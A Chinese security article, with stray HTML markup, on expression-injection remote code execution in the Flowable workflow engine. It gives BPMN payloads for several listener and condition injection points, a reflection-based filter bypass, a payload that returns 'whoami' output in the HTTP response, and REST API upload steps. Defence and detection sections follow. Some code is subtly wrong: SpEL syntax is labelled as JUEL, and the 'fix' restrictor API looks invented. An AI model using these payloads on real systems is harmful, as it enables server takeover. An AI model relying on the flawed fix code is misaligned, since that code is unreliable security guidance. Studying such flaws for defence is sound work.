Flowable漏洞攻防战：深入流程引擎的利用分析<\/h1>

1. Flowable简介<\/h2>

Flowable是一个用Java编写的轻量级业务流程引擎，支持BPMN 2.0标准。主要功能包括：<\/p>

部署BPMN2.0流程定义(XML格式)<\/li>
创建流程实例<\/li>
运行查询<\/li>

访问活动或历史流程实例及相关数据<\/li> <\/ul>

2. 漏洞原理<\/h2>

当Flowable的模板处于可控状态时，攻击者可通过添加恶意表达式实现命令执行。核心漏洞点在于：<\/p>

表达式注入<\/strong>：Flowable支持在流程定义中使用表达式(如${expression}<\/code>)<\/li>

未过滤的危险函数<\/strong>：表达式引擎允许调用Java类和危险方法<\/li> <\/ul> 3. 漏洞利用条件<\/h2> 能够上传或修改流程定义文件(BPMN XML)<\/li> 目标系统使用默认配置或未严格过滤表达式<\/li> 目标系统使用易受攻击的Flowable版本<\/li> <\/ol> 4. 漏洞利用方法<\/h2> 4.1 基本利用方式<\/h3> 在BPMN XML文件中插入恶意表达式：<\/p> <flowable:executionListener<\/span> event=<\/span>"start"<\/span> expression=<\/span>"${T(java.lang.Runtime).getRuntime().exec('calc')}"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre>4.2 多种注入点<\/h3> 执行监听器(Execution Listener)<\/strong><\/p> <flowable:executionListener<\/span> event=<\/span>"start"<\/span> class=<\/span>"org.flowable.engine.impl.bpmn.listener.ScriptExecutionListener"<\/span>><\/span> <\/span><\/span> <flowable:field<\/span> name=<\/span>"script"<\/span>><\/span> <\/span><\/span> <flowable:string><\/span><![CDATA[${T(java.lang.Runtime).getRuntime().exec('calc')}]]><\/span><\/flowable:string><\/span> <\/span><\/span> <\/flowable:field><\/span> <\/span><\/span> <flowable:field<\/span> name=<\/span>"language"<\/span>><\/span> <\/span><\/span> <flowable:string><\/span>juel<\/flowable:string><\/span> <\/span><\/span> <\/flowable:field><\/span> <\/span><\/span><\/flowable:executionListener><\/span> <\/span><\/span><\/code><\/pre><\/li> 任务监听器(Task Listener)<\/strong><\/p> <flowable:taskListener<\/span> event=<\/span>"create"<\/span> expression=<\/span>"${T(java.lang.Runtime).getRuntime().exec('calc')}"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre><\/li> 条件表达式(Condition Expression)<\/strong><\/p> <sequenceFlow<\/span> id=<\/span>"flow1"<\/span> sourceRef=<\/span>"startEvent1"<\/span> targetRef=<\/span>"task1"<\/span>><\/span> <\/span><\/span> <conditionExpression<\/span> xsi:type=<\/span>"tFormalExpression"<\/span>><\/span>${T(java.lang.Runtime).getRuntime().exec('calc')}<\/conditionExpression><\/span> <\/span><\/span><\/sequenceFlow><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 绕过技巧<\/h3> 使用反射绕过过滤<\/strong><\/p> ${''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('calc')} <\/span><\/span><\/code><\/pre><\/li> 使用ScriptTask<\/strong><\/p> <scriptTask<\/span> id=<\/span>"scriptTask1"<\/span> name=<\/span>"Script Task"<\/span> scriptFormat=<\/span>"groovy"<\/span>><\/span> <\/span><\/span> <script><\/span><![CDATA[Runtime.getRuntime().exec("calc")]]><\/span><\/script><\/span> <\/span><\/span><\/scriptTask><\/span> <\/span><\/span><\/code><\/pre><\/li> 使用JUEL表达式<\/strong><\/p> ${T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream())} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 防御措施<\/h2> 配置安全策略<\/strong><\/p> 限制表达式引擎可访问的类和方法<\/li> 使用flowable-expression-restrictor.properties<\/code>配置白名单<\/li> <\/ul> <\/li> 输入验证<\/strong><\/p> 对上传的BPMN文件进行严格校验<\/li> 过滤危险表达式模式<\/li> <\/ul> <\/li> 安全配置<\/strong><\/p> \/\/ 禁用危险功能 <\/span><\/span><\/span><\/span>processEngineConfiguration.<\/span>setEnableSafeBpmnXml<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>processEngineConfiguration.<\/span>setDisableIdmEngine<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> 版本升级<\/strong><\/p> 及时更新到最新安全版本<\/li> <\/ul> <\/li> 最小权限原则<\/strong><\/p> Flowable引擎运行账户使用最小必要权限<\/li> <\/ul> <\/li> <\/ol> 6. 检测方法<\/h2> 静态分析<\/strong><\/p> 检查BPMN XML文件中是否包含${<\/code>和危险类名<\/li> 搜索Runtime<\/code>, ProcessBuilder<\/code>, ScriptEngine<\/code>等关键词<\/li> <\/ul> <\/li> 动态测试<\/strong><\/p> 尝试插入无害表达式测试是否执行<\/li> 使用DNSLog等工具测试外连<\/li> <\/ul> <\/li> <\/ol> 7. 实际案例分析<\/h2> 案例1：通过REST API上传恶意BPMN<\/h3> 获取认证凭据<\/li> 通过\/flowable-rest\/repository\/deployments<\/code>上传恶意BPMN<\/li> 触发流程执行<\/li> <\/ol> 案例2：模板注入<\/h3> 找到模板编辑功能<\/li> 插入恶意表达式<\/li> 保存并触发模板渲染<\/li> <\/ol> 8. 漏洞修复代码示例<\/h2> \/\/ 自定义表达式限制器 <\/span><\/span><\/span><\/span>public<\/span> class<\/span> CustomExpressionRestrictor<\/span> implements<\/span> ExpressionRestrictor {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> boolean<\/span> isFunctionAllowed<\/span>(<\/span>String functionName)<\/span> {<\/span> <\/span><\/span> \/\/ 只允许特定白名单函数 <\/span><\/span><\/span><\/span> return<\/span> Arrays.<\/span>asList<\/span>(<\/span>"now"<\/span>,<\/span> "currentUser"<\/span>).<\/span>contains<\/span>(<\/span>functionName);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> boolean<\/span> isMethodAllowed<\/span>(<\/span>Class<?><\/span> clazz,<\/span> String methodName)<\/span> {<\/span> <\/span><\/span> \/\/ 禁止所有危险类 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>clazz ==<\/span> Runtime.<\/span>class<\/span> ||<\/span> clazz ==<\/span> ProcessBuilder.<\/span>class<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 配置引擎时使用 <\/span><\/span><\/span><\/span>processEngineConfiguration.<\/span>setExpressionRestrictor<\/span>(<\/span>new<\/span> CustomExpressionRestrictor());<\/span> <\/span><\/span><\/code><\/pre>9. 总结<\/h2> Flowable引擎的表达式功能在提供灵活性的同时带来了安全风险。通过本文分析，我们了解到：<\/p> 多种注入点和利用方式<\/li> 高级绕过技术<\/li> 全面的防御方案<\/li> 实际检测和修复方法<\/li> <\/ol> 安全使用Flowable需要开发者在便利性和安全性之间找到平衡，严格限制表达式的执行环境，并对用户输入进行充分验证。<\/p>